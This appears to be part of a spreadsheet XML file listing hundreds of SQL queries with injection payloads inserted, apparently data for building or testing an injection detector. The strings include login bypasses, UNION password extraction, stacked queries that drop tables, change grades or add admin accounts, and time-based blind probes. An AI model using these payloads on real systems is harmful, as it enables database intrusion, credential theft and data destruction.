    <t>SELECT * from test.members where user_name=' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT email from users where email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</si>
  <si>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user_name,password from test.members where user_name= '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or 0=0 #' and password=''</t>
  </si>
  <si>
    <t>SELECT 1,2, '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = '''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''; TRUNCATE TABLE Username; --' and password='';</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= '"'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' OR username IS NOT NULL OR username = ' ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''; DROP table Username --' and password=''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='' union select password from users where name = 'Robin' --' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' a' or 'a' = 'a' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from username where type = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''union select 1,2,3,x,x,x,x,@@version,x--' and password='';</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ''ddd"' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email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</si>
  <si>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username where type = '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''ddd"'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email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</si>
  <si>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product WHERE PCategory=' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT email from users where email = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = 'ddd' group by (password)--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''; DROP table Username --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from user where id ='''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or 'a'='a' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' 1 AND USER_NAME() = \'dbo\'-- ' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''ddd"'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''; DROP table Username --' and password='';</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or 1 UNION SELECT ALL FROM WHERE--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- ' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/'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</si>
  <si>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 ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or 1=1--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT 1,2, '; TRUNCATE TABLE Username; -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' OR username IS NOT NULL OR username = ' ' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' 'sqlvuln' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ''ddd"'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''union select all 1,2,x,x,x,x --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or 1 UNION SELECT ALL FROM WHERE-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' \\'; DESC users; -- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or 0=0 --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or 'x'='x' and password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, " FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT 1,2, \\'; DESC users; -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' admin'-- '</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or 1=1-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' 1 OR 1=1-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from user where id =' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = '"'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * from table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</si>
  <si>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test.members where user_name=''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''union select 1,2,3,x,x,x,x,@@version,x--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' a' or 1=1--' and password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' OR 1=1-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = '"' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT 1,2, 'ddd" FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' 1' AND non_existant_table = '1 ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT 1,2, ' 1 OR 1=1-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or 'x'='x' and password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 'x'='x' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = '"'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' \\'; DESC users; -- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT 1,2, '%31%27%20%4F%52%20%27%31%27%3D%27%31 FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='ddd' compute sum(username)--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or 1 UNION SELECT ALL FROM WHERE--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM users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</si>
  <si>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</si>
  <si>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 a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= 'ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ''union select all 1,2,x,x,x,x --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' 1 AND USER_NAME() = \'dbo\'-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' 1 AND 1=1-- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = 'ddd' union select username,password from students --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' admin'-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' OR username IS NOT NULL OR username = ' ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * from table where username = '' union select password from users where name = 'Robin' --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * from username where type = 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''ddd"' AND password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or 0=0 #' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT * from user where id 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</si>
  <si>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data FROM table WHERE Emailinput = ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * from username where type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</si>
  <si>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 where id =' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * from user where id ='' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= '''</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or 1 UNION SELECT ALL FROM WHERE--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID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</si>
  <si>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data FROM table WHERE Emailinput = 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * from table where username = '"' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or 1 EXEC XP_ ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--' and password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, 'union select all 1,2,x,x,x,x -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * from table where username = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from table where username = 'ddd' union select username,password from students --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' 1 AND 1=1-- ' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- ' and password='';</t>
  </si>
  <si>
    <t>SELECT 1,2, ' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1 FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT 1,2, a' or 1=1-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = '''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username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</si>
  <si>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1,2, hi' or 1=1 -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' '' ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' hi' or 1=1 --' and password='';</t>
  </si>
  <si>
    <t>SELECT 1,2, ddd' group by (studentid)-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' \\'; DESC users; -- ' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' hi' or 1=1 --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT 1,2, 'or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 'a'='a' and password='';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</si>
  <si>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</si>
  <si>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students WHERE username = ' ' 1 AND 1=1-- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''ddd"'</t>
  </si>
  <si>
    <t>SELECT email from users where email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</si>
  <si>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test.members where user_name=' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * from table where username = 'ddd' union select username from students --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='ddd' union select username from students --' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' 1 OR 1=1-- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''ddd"'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or 0=0 --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 1 EXEC XP_ ' and password='';</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = '"'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 'sqlvuln' and password='';</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' admin'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='' union select password from users where name = 'Robin' --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --' and password=''</t>
  </si>
  <si>
    <t>SELECT * from user where id =' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- ' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''union select all 1,2,x,x,x,x --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' 1\\'1-- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, 'union select 1,2,3,x,x,x,x,@@version,x-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' 1 AND 1=1-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1' and password='';</t>
  </si>
  <si>
    <t>SELECT * from username where type = '"'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''; DROP table Username --'</t>
  </si>
  <si>
